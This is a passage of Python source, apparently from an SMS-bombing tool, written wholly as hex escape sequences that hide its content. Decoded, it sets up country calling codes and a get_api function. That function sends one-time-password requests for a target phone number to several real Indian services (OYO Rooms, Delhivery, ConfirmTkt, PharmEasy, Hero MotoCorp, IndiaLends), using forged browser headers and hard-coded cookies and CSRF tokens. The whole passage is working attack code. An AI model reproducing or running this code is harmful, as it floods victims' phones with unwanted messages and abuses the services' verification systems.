x54\x4e\x27\x2c\x27\x39\x30\x27\x3a\x20\x27\x54\x52\x27\x2c\x27\x39\x39\x33\x27\x3a\x20\x27\x54\x4d\x27\x2c\x27\x36\x38\x38\x27\x3a\x20\x27\x54\x56\x27\x2c\x27\x32\x35\x36\x27\x3a\x20\x27\x55\x47\x27\x2c\x27\x33\x38\x30\x27\x3a\x20\x27\x55\x41\x27\x2c\x27\x39\x37\x31\x27\x3a\x20\x27\x41\x45\x27\x2c\x27\x34\x34\x27\x3a\x20\x27\x47\x42\x27\x2c\x27\x31\x27\x3a\x20\x27\x55\x53\x27\x2c\x27\x35\x39\x38\x27\x3a\x20\x27\x55\x59\x27\x2c\x27\x39\x39\x38\x27\x3a\x20\x27\x55\x5a\x27\x2c\x27\x36\x37\x38\x27\x3a\x20\x27\x56\x55\x27\x2c\x27\x33\x37\x39\x27\x3a\x20\x27\x56\x41\x27\x2c\x27\x35\x38\x27\x3a\x20\x27\x56\x45\x27\x2c\x27\x38\x34\x27\x3a\x20\x27\x56\x4e\x27\x2c\x27\x36\x38\x31\x27\x3a\x20\x27\x57\x46\x27\x2c\x27\x39\x36\x37\x27\x3a\x20\x27\x59\x45\x27\x2c\x27\x32\x36\x30\x27\x3a\x20\x27\x5a\x4d\x27\x2c\x27\x32\x36\x33\x27\x3a\x20\x27\x5a\x57\x27\x7d\x0a\x0a\x0a\x64\x65\x66\x20\x74\x65\x73\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x0a\x0a\x64\x65\x66\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x70\x6e\x2c\x6c\x69\x6d\x2c\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x63\x63\x3d\x73\x74\x72\x28\x63\x63\x29\x0a\x20\x20\x20\x20\x70\x6e\x3d\x73\x74\x72\x28\x70\x6e\x29\x0a\x20\x20\x20\x20\x6c\x69\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6c\x69\x6d\x29\x0a\x20\x20\x20\x20\x75\x72\x6c\x20\x3d\x20\x5b\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x79\x6f\x72\x6f\x6f\x6d\x73\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x70\x77\x61\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x6f\x74\x70\x3f\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x3d\x25\x32\x42\x22\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x72\x28\x63\x63\x29\x20\x2b\x20\x22\x26\x6e\x6f\x64\x3d\x34\x26\x70\x68\x6f\x6e\x65\x3d\x22\x20\x2b\x20\x70\x6e\x2c\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x69\x72\x65\x63\x74\x2e\x64\x65\x6c\x68\x69\x76\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x64\x65\x6c\x68\x69\x76\x65\x72\x79\x64\x69\x72\x65\x63\x74\x2f\x6f\x72\x64\x65\x72\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x2d\x6f\x74\x70\x3f\x70\x68\x6f\x6e\x65\x4e\x6f\x3d\x22\x20\x2b\x20\x70\x6e\x2c\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x65\x63\x75\x72\x65\x64\x61\x70\x69\x2e\x63\x6f\x6e\x66\x69\x72\x6d\x74\x6b\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x70\x6c\x61\x74\x66\x6f\x72\x6d\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x3f\x6d\x6f\x62\x69\x6c\x65\x4e\x75\x6d\x62\x65\x72\x3d\x22\x20\x2b\x20\x70\x6e\x5d\x0a\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6c\x69\x6d\x20\x3c\x20\x6c\x65\x6e\x28\x75\x72\x6c\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x2e\x75\x72\x6c\x6f\x70\x65\x6e\x28\x73\x74\x72\x28\x75\x72\x6c\x5b\x6c\x69\x6d\x5d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x28\x75\x72\x6c\x6c\x69\x62\x2e\x65\x72\x72\x6f\x72\x2e\x48\x54\x54\x50\x45\x72\x72\x6f\x72\x2c\x20\x75\x72\x6c\x6c\x69\x62\x2e\x65\x72\x72\x6f\x72\x2e\x55\x52\x4c\x45\x72\x72\x6f\x72\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x36\x35\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x36\x35\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x33\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x6f\x6e\x74\x61\x63\x74\x4e\x75\x6d\x62\x65\x72\x22\x3a\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x61\x75\x74\x68\x2f\x72\x65\x71\x75\x65\x73\x74\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73\x74\x61\x74\x75\x73\x5f\x63\x6f\x64\x65\x3d\x3d\x32\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x34\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x32\x37\x33\x34\x36\x30\x36\x31\x30\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x37\x32\x35\x37\x34\x32\x39\x39\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x63\x6c\x5f\x61\x75\x27\x3a\x20\x27\x31\x2e\x31\x2e\x38\x33\x33\x35\x35\x36\x36\x36\x30\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x38\x37\x30\x39\x2e\x31\x37\x30\x37\x37\x32\x32\x31\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x50\x48\x50\x53\x45\x53\x53\x49\x44\x27\x3a\x20\x27\x6d\x35\x74\x61\x70\x37\x6e\x72\x37\x35\x62\x32\x65\x68\x63\x6e\x38\x75\x72\x32\x36\x31\x6f\x71\x38\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x31\x30\x31\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x2f\x65\x6e\x2d\x69\x6e\x2f\x78\x70\x75\x6c\x73\x65\x32\x30\x30\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x5f\x6e\x6f\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x61\x6e\x64\x6f\x6d\x65\x27\x3a\x20\x27\x5a\x5a\x55\x43\x39\x57\x43\x43\x50\x33\x6c\x74\x73\x64\x2f\x4a\x6f\x71\x46\x65\x35\x48\x48\x65\x36\x57\x66\x4e\x5a\x66\x64\x51\x78\x71\x69\x39\x4f\x5a\x57\x76\x4b\x69\x73\x3d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x5f\x6e\x6f\x5f\x6f\x74\x70\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x73\x72\x66\x27\x3a\x20\x27\x35\x32\x33\x62\x63\x33\x66\x61\x31\x38\x35\x37\x63\x34\x64\x66\x39\x35\x65\x34\x64\x32\x34\x62\x62\x64\x33\x36\x63\x36\x31\x62\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x2f\x65\x6e\x2d\x69\x6e\x2f\x78\x70\x75\x6c\x73\x65\x32\x30\x30\x2f\x61\x6a\x61\x78\x5f\x64\x61\x74\x61\x2e\x70\x68\x70\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73\x74\x61\x74\x75\x73\x5f\x63\x6f\x64\x65\x3d\x3d\x32\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x35\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x34\x38\x33\x38\x38\x35\x33\x31\x34\x2e\x31\x35\x35\x39\x31\x35\x37\x36\x34\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x35\x39\x31\x35\x37\x36\x34\x37\x31\x36\x31\x2e\x31\x39\x38\x39\x32\x30\x35\x31\x33\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x69\x50\x4d\x69\x78\x27\x3a\x20\x27\x39\x31\x2e\x39\x39\x30\x39\x31\x38\x35\x32\x32\x36\x39\x36\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x74\x72\x61\x63\x6b\x27\x3a\x20\x27\x53\x45\x4f\x20\x2d\x20\x47\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x6b\x65\x79\x77\x6f\x72\x64\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x6c\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x75\x74\x6d\x5f\x6d\x65\x64\x69\x75\x6d\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x75\x74\x6d\x5f\x63\x61\x6d\x70\x61\x69\x67\x6e\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x53\x50\x2e\x4e\x45\x54\x5f\x53\x65\x73\x73\x69\x6f\x6e\x49\x64\x27\x3a\x20\x27\x69\x6f\x71\x6b\x65\x6b\x35\x6c\x62\x67\x76\x6c\x64\x6c\x71\x34\x69\x33\x63\x6d\x69\x6a\x63\x73\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x5f\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x75\x74\x6d\x5f\x73\x6f\x75\x72\x63\x65\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x5f\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x75\x72\x6c\x27\x3a\x20\x27\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x72\x65\x66\x65\x72\x72\x61\x6c\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x52\x52\x41\x66\x66\x69\x6e\x69\x74\x79\x27\x3a\x20\x27\x37\x34\x37\x65\x30\x63\x32\x36\x36\x34\x66\x35\x63\x62\x36\x31\x37\x39\x35\x38\x33\x39\x36\x33\x64\x38\x33\x34\x66\x34\x38\x39\x39\x65\x65\x65\x39\x66\x36\x63\x38\x64\x63\x63\x37\x37\x33\x66\x63\x30\x35\x63\x65\x34\x35\x66\x61\x30\x36\x62\x32\x34\x31\x37\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x39\x36\x39\x36\x32\x33\x37\x30\x35\x2e\x31\x35\x36\x30\x36\x36\x30\x34\x34\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x74\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x72\x65\x6e\x74\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x73\x5f\x70\x6c\x62\x74\x27\x3a\x20\x27\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x37\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x65\x79\x64\x65\x72\x30\x33\x74\x65\x61\x65\x61\x72\x65\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\